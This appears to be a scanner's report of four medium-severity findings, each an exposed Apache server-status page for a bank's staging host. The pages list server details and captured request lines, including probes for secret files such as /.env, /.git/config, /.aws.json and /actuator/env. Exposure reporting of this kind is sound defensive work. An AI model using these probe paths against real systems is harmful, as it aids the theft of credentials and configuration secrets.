1-209-0/0/10295. 0.00163484218058310.00.0068.46 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10279. 0.001634842110411210.00.0078.54 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10252. 0.00163484257212700.00.0069.90 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10209. 0.00163484228232520.00.0071.76 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10230. 0.00163484267959070.00.0072.95 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10172. 0.00163484217702370.00.0072.28 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10207. 0.00163484217941110.00.0069.08 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10314. 0.00163484257888760.00.0068.47 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10199. 0.00163484218038470.00.0068.84 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10244. 0.00163484218301040.00.0071.23 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10238. 0.00163484207972770.00.0068.86 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 2-2287097000/17/7947_ 0.8091111043000.00.0361.66 127.0.0.1http/1.1127.0.1.1:8080
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b251a498a68c
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.62 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2024-10-04T15:21:08 Current Time: Wednesday, 23-Jul-2025 07:07:10 CEST Restart Time: Tuesday, 10-Dec-2024 16:11:42 CET Parent Server Config. Generation: 226 Parent Server MPM Generation: 225 Server uptime: 224 days 13 hours 55 minutes 27 seconds Server load: 0.00 0.00 0.00 Total accesses: 833089 - Total Traffic: 7.5 GB - Total Duration: 103174587 CPU Usage: u569.17 s781.16 cu1039.95 cs367.98 - .0142% CPU load .0429 requests/sec - 414 B/second - 9.4 kB/request - 123.846 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewritingkeep-aliveclosing 0264878no0yes1024000 2264877no0yes0025000 Sum200 1049000 ____W____________________.........................______________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-2252648780/5/7742_ 0.203719611350.00.00106.21 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-2252648780/3/7649_ 0.1523709420120.00.0088.82 127.0.0.1http/1.1127.0.1.1:8080GET /.aws.json HTTP/1.1 0-2252648780/4/7573_ 0.1723729542440.00.0174.02 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-2252648780/5/7621_ 0.1963739191630.00.0173.06 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-22526487811/5/7593W 0.19009450700.00.0183.14 127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1 0-2252648780/3/7579_ 0.200010033740.00.0181.37 127.0.0.1http/1.1127.0.1.1:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-2252648780/3/7661_ 0.20009505860.00.0186.20 127.0.0.1http/1.1127.0.1.1:8080GET /about HTTP/1.1 0-2252648780/3/7694_ 0.20009816520.00.01122.73 127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1 0-2252648780/3/7673_ 0.20009652380.00.0190.98 127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1 0-2252648780/5/7638_ 0.20009937770.00.01106.28 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1 0-2252648780/5/7642_ 0.20009381390.00.0173.50 127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1 0-2252648780/4/7651_ 0.1667419414310.00.0189.20 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-2252648780/4/7597_ 0.20009268080.00.0277.58 127.0.0.1http/1.1127.0.1.1:8080GET /actuator/env HTTP/1.1 0-2252648780/3/7577_ 0.1567409739700.00.00100.75 127.0.0.1http/1.1127.0.1.1:8080GET /i.php HTTP/1.1 0-2252648780/4/7675_ 0.20009082500.00.01111.80 127.0.0.1http/1.1127.0.1.1:8080GET /@vite/env HTTP/1.1 0-2252648780/4/7547_ 0.1663209371590.00.0083.12 127.0.0.1http/1.1127.0.1.1:8080GET /devicedesc.xml HTTP/1.1 0-2252648780/3/7621_ 0.1563209387230.00.0182.25 127.0.0.1http/1.1127.0.1.1:8080GET /test.php HTTP/1.1 0-2252648780/4/7663_ 0.20419459020.00.02109.98 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-2252648780/5/7696_ 0.20409551000.00.0176.56 127.0.0.1http/1.1127.0.1.1:8080GET /icons/openlogo-75.png HTTP/1.1 0-2252648780/5/7675_ 0.2033729290940.00.0190.17 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-2252648780/3/7581_ 0.153209356270.00.0191.25 127.0.0.1http/1.1127.0.1.1:8080GET /app/config.json HTTP/1.1 0-2252648780/4/7621_ 0.1633219440140.00.01128.83 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-2252648780/3/7703_ 0.1533209690020.00.0177.25 127.0.0.1http/1.1127.0.1.1:8080GET /config/.aws.json HTTP/1.1 0-2252648780/5/7610_ 0.183219412070.00.0185.22 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-2252648780/5/7595_ 0.2024219882040.00.0196.19 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10296. 0.00132162517781040.00.0069.50 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10267. 0.00132162517833080.00.0071.05 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10270. 0.00132162517366290.00.0072.96 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10319. 0.00132162527889220.00.0074.01 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10290. 0.00132162517857840.00.0072.96 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10317. 0.00132162557622980.00.0071.38 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10313. 0.00132162527737050.00.0070.26 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10224. 0.00132162538921940.00.0079.39 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10344. 0.00132162517862610.00.0071.14 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10222. 0.00132162528023840.00.0073.64 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10235. 0.00132162517612320.00.0068.63 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10205. 0.00132162517762580.00.0070.38 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10271. 0.00132162507726070.00.0071.88 127.0.0.1http/1.1127.0.1.1:8080GET /.git/config HTTP/1.1 1-209-0/0/10166. 0.00132162527895970.00.0069.47 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10295. 0.00132162518058310.00.0068.46 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10279. 0.001321625110411210.00.0078.54 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10252. 0.00132162557212700.00.0069.90 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10209. 0.00132162528232520.00.0071.76 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10230. 0.00132162567959070.00.0072.95 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10172. 0.00132162517702370.00.0072.28 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10207. 0.00132162517941110.00.0069.08 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10314. 0.00132162557888760.00.0068.47 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10199. 0.00132162518038470.00.0068.84 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10244. 0.00132162518301040.00.0071.23 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10238. 0.00132162507972770.00.0068.86 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 2-2252648770/7/7754_ 0.54876111039100.00.0160.21 127.0.0.1http/1.1127.0.1.1:8080GET / HTT
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b25125d63254
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.62 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2024-10-04T15:21:08 Current Time: Sunday, 20-Jul-2025 21:14:00 CEST Restart Time: Tuesday, 10-Dec-2024 16:11:42 CET Parent Server Config. Generation: 223 Parent Server MPM Generation: 222 Server uptime: 222 days 4 hours 2 minutes 17 seconds Server load: 0.08 0.03 0.00 Total accesses: 829153 - Total Traffic: 7.5 GB - Total Duration: 103154793 CPU Usage: u564.74 s773.42 cu1032.6 cs365.4 - .0143% CPU load .0432 requests/sec - 418 B/second - 9.5 kB/request - 124.41 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewritingkeep-aliveclosing 04014575no0yes0025000 24014574no0yes1024000 Sum200 1049000 _________________________.........................______________ __W________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-22240145750/27/7673_ 1.66134239610610.00.05106.07 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-22240145750/35/7591_ 1.6918329419270.00.0788.65 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-22240145750/34/7514_ 1.6914109541610.00.0773.87 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-22240145750/28/7554_ 1.6514109184890.00.0672.91 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-22240145750/24/7535_ 1.72134759449890.00.0583.01 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-22240145750/29/7520_ 1.691342210032940.00.0681.26 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-22240145750/27/7598_ 1.7285019504880.00.0586.06 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-22240145750/30/7641_ 1.72104729810040.00.07122.60 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-22240145750/29/7613_ 1.68104219646410.00.0690.84 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-22240145750/29/7566_ 1.6884529926740.00.06106.09 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-22240145750/30/7584_ 1.72124109380500.00.0773.32 127.0.0.1http/1.1127.0.1.1:8080POST / HTTP/1.1 0-22240145750/26/7594_ 1.67108319408750.00.0589.04 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-22240145750/27/7538_ 1.7278809267140.00.0677.43 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-22240145750/25/7511_ 1.6578329738830.00.05100.63 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-22240145750/26/7616_ 1.66123619081800.00.07111.66 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-22240145750/25/7493_ 1.64104259367740.00.0682.99 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-22240145750/30/7564_ 1.6878339386450.00.0782.11 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-22240145750/29/7604_ 1.72108819458130.00.07109.86 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-22240145750/23/7623_ 1.6484519549900.00.0576.33 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-22240145750/25/7612_ 1.6518349289950.00.0389.78 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-22240145750/26/7519_ 1.63108319355310.00.0591.07 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-22240145750/25/7570_ 1.72124109439250.00.05128.65 127.0.0.1http/1.1127.0.1.1:8080GET /.env HTTP/1.1 0-22240145750/24/7649_ 1.63123629689360.00.0577.11 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-22240145750/25/7550_ 1.7314639411220.00.0585.05 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-22240145750/30/7530_ 1.7318819881140.00.0696.02 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10296. 0.00111323517781040.00.0069.50 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10267. 0.00111323517833080.00.0071.05 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10270. 0.00111323517366290.00.0072.96 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10319. 0.00111323527889220.00.0074.01 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10290. 0.00111323517857840.00.0072.96 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10317. 0.00111323557622980.00.0071.38 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10313. 0.00111323527737050.00.0070.26 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10224. 0.00111323538921940.00.0079.39 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10344. 0.00111323517862610.00.0071.14 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10222. 0.00111323528023840.00.0073.64 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10235. 0.00111323517612320.00.0068.63 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10205. 0.00111323517762580.00.0070.38 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10271. 0.00111323507726070.00.0071.88 127.0.0.1http/1.1127.0.1.1:8080GET /.git/config HTTP/1.1 1-209-0/0/10166. 0.00111323527895970.00.0069.47 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10295. 0.00111323518058310.00.0068.46 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10279. 0.001113235110411210.00.0078.54 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10252. 0.00111323557212700.00.0069.90 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10209. 0.00111323528232520.00.0071.76 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10230. 0.00111323567959070.00.0072.95 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10172. 0.00111323517702370.00.0072.28 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10207. 0.00111323517941110.00.0069.08 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10314. 0.00111323557888760.00.0068.47 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10199. 0.00111323518038470.00.0068.84 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10244. 0.00111323518301040.00.0071.23 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10238. 0.00111323507972770.00.0068.86 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 2-22240145740/20/7661_ 0.80441111037810.00.0359.76 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b251297c670c
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.62 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2024-10-04T15:21:08 Current Time: Saturday, 19-Jul-2025 02:27:56 CEST Restart Time: Tuesday, 10-Dec-2024 16:11:42 CET Parent Server Config. Generation: 222 Parent Server MPM Generation: 221 Server uptime: 220 days 9 hours 16 minutes 13 seconds Server load: 0.00 0.00 0.00 Total accesses: 826098 - Total Traffic: 7.5 GB - Total Duration: 103151458 CPU Usage: u558.73 s766.73 cu1030.14 cs364.46 - .0143% CPU load .0434 requests/sec - 421 B/second - 9.5 kB/request - 124.866 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewritingkeep-aliveclosing 03866514no0yes1024000 23866513no0yes0025000 Sum200 1049000 ____________W____________.........................______________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-22138665140/5/7598_ 0.20019609620.00.02105.94 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-22138665140/2/7507_ 0.153539418230.00.0088.50 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-22138665140/3/7434_ 0.123509540680.00.0073.72 127.0.0.1http/1.1127.0.1.1:8080GET /favicon.ico HTTP/1.1 0-22138665140/4/7476_ 0.1141809184050.00.0172.77 127.0.0.1http/1.1127.0.1.1:8080GET /favicon.ico HTTP/1.1 0-22138665140/4/7465_ 0.20009448980.00.0182.89 127.0.0.1http/1.1127.0.1.1:8080GET /@vite/env HTTP/1.1 0-22138665140/2/7443_ 0.200010031970.00.0081.13 127.0.0.1http/1.1127.0.1.1:8080GET /actuator/env HTTP/1.1 0-22138665140/5/7524_ 0.20009503890.00.0185.93 127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1 0-22138665140/5/7563_ 0.20009809100.00.01122.46 127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1 0-22138665140/2/7535_ 0.20009645430.00.0090.70 127.0.0.1http/1.1127.0.1.1:8080GET /about HTTP/1.1 0-22138665140/4/7491_ 0.20009925750.00.01105.97 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1 0-22138665140/5/7506_ 0.20009379330.00.0173.19 127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1 0-22138665140/2/7519_ 0.20009407700.00.0088.91 127.0.0.1http/1.1127.0.1.1:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-221386651410/3/7463W 0.19009266130.00.0177.29 127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1 0-22138665140/4/7437_ 0.1167719737980.00.01100.48 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-22138665140/1/7543_ 0.1667729080810.00.00111.53 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-22138665140/3/7421_ 0.1942319366870.00.0182.86 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-22138665140/2/7490_ 0.1641809385580.00.0081.98 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-22138665140/3/7526_ 0.1916719457050.00.01109.71 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-22138665140/3/7552_ 0.1116219548940.00.0176.21 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-22138665140/2/7539_ 0.1616209289070.00.0089.67 127.0.0.1http/1.1127.0.1.1:8080GET /favicon.ico HTTP/1.1 0-22138665140/3/7444_ 0.208219354460.00.0190.95 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-22138665140/4/7500_ 0.127749438270.00.01128.52 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-22138665140/2/7580_ 0.167719688480.00.0176.99 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-22138665140/3/7478_ 0.204319410290.00.0184.92 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-22138665140/6/7453_ 0.204009880030.00.0195.88 127.0.0.1http/1.1127.0.1.1:8080GET /favicon.ico HTTP/1.1 1-209-0/0/10296. 0.0095927117781040.00.0069.50 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10267. 0.0095927117833080.00.0071.05 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10270. 0.0095927117366290.00.0072.96 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10319. 0.0095927127889220.00.0074.01 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10290. 0.0095927117857840.00.0072.96 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10317. 0.0095927157622980.00.0071.38 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10313. 0.0095927127737050.00.0070.26 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10224. 0.0095927138921940.00.0079.39 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10344. 0.0095927117862610.00.0071.14 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10222. 0.0095927128023840.00.0073.64 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10235. 0.0095927117612320.00.0068.63 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10205. 0.0095927117762580.00.0070.38 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10271. 0.0095927107726070.00.0071.88 127.0.0.1http/1.1127.0.1.1:8080GET /.git/config HTTP/1.1 1-209-0/0/10166. 0.0095927127895970.00.0069.47 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10295. 0.0095927118058310.00.0068.46 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10279. 0.00959271110411210.00.0078.54 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10252. 0.0095927157212700.00.0069.90 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10209. 0.0095927128232520.00.0071.76 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10230. 0.0095927167959070.00.0072.95 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10172. 0.0095927117702370.00.0072.28 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10207. 0.0095927117941110.00.0069.08 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10314. 0.0095927157888760.00.0068.47 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10199. 0.0095927118038470.00.0068.84 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10244. 0.0095927118301040.00.0071.23 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10238. 0.0095927107972770.00.0068.86 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 2-22138665130/2/7620_ 0.051623111037490.00.0159.70 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 2-221
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b251a3779292
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.62 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2024-10-04T15:21:08 Current Time: Saturday, 12-Jul-2025 19:22:03 CEST Restart Time: Tuesday, 10-Dec-2024 16:11:42 CET Parent Server Config. Generation: 215 Parent Server MPM Generation: 214 Server uptime: 214 days 2 hours 10 minutes 20 seconds Server load: 0.02 0.02 0.00 Total accesses: 817412 - Total Traffic: 7.4 GB - Total Duration: 103059414 CPU Usage: u544.62 s745.79 cu1012.1 cs358.31 - .0144% CPU load .0442 requests/sec - 431 B/second - 9.5 kB/request - 126.08 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewritingkeep-aliveclosing 02829370no0yes0025000 22829368no1yes1024010 Sum201 1049010 _________________________.........................______W_______ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-21428293700/9/7423_ 0.633059596410.00.02105.31 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-21428293700/13/7357_ 0.592529358280.00.0387.82 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-21428293700/8/7277_ 0.502519538080.00.0273.15 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-21428293700/8/7337_ 0.48223009176660.00.0172.26 127.0.0.1http/1.1127.0.1.1:8080GET /.git/config HTTP/1.1 0-21428293700/13/7304_ 0.59187019425900.00.0282.33 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-21428293700/10/7314_ 0.541865010026200.00.0280.53 127.0.0.1http/1.1127.0.1.1:8080GET /.git/config HTTP/1.1 0-21428293700/7/7370_ 0.49186509485870.00.0185.24 127.0.0.1http/1.1127.0.1.1:8080GET /telescope/requests HTTP/1.1 0-21428293700/12/7395_ 0.60153039799040.00.03121.86 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-21428293700/9/7388_ 0.54152519620280.00.0289.98 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-21428293700/6/7343_ 0.49152509913300.00.01105.44 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-21428293700/11/7347_ 0.60123049371130.00.0272.38 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-21428293700/9/7382_ 0.57122509402010.00.0288.45 127.0.0.1http/1.1127.0.1.1:8080GET /robots.txt HTTP/1.1 0-21428293700/6/7319_ 0.57122509223620.00.0176.55 127.0.0.1http/1.1127.0.1.1:8080GET /sitemap.xml HTTP/1.1 0-21428293700/10/7265_ 0.60115619725840.00.0299.29 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-21428293700/11/7371_ 0.54115129053890.00.02110.92 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-21428293700/8/7273_ 0.49115119364290.00.0282.20 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-21428293700/10/7343_ 0.6197019359390.00.0281.46 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-21428293700/11/7375_ 0.5496529450190.00.03108.98 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-21428293700/8/7389_ 0.4996519546220.00.0175.67 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-21428293700/10/7379_ 0.6266919266990.00.0288.86 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-21428293700/11/7302_ 0.5866409296500.00.0290.33 127.0.0.1http/1.1127.0.1.1:8080GET /favicon.ico HTTP/1.1 0-21428293700/7/7346_ 0.4966409372540.00.01127.98 127.0.0.1http/1.1127.0.1.1:8080GET /.git/config HTTP/1.1 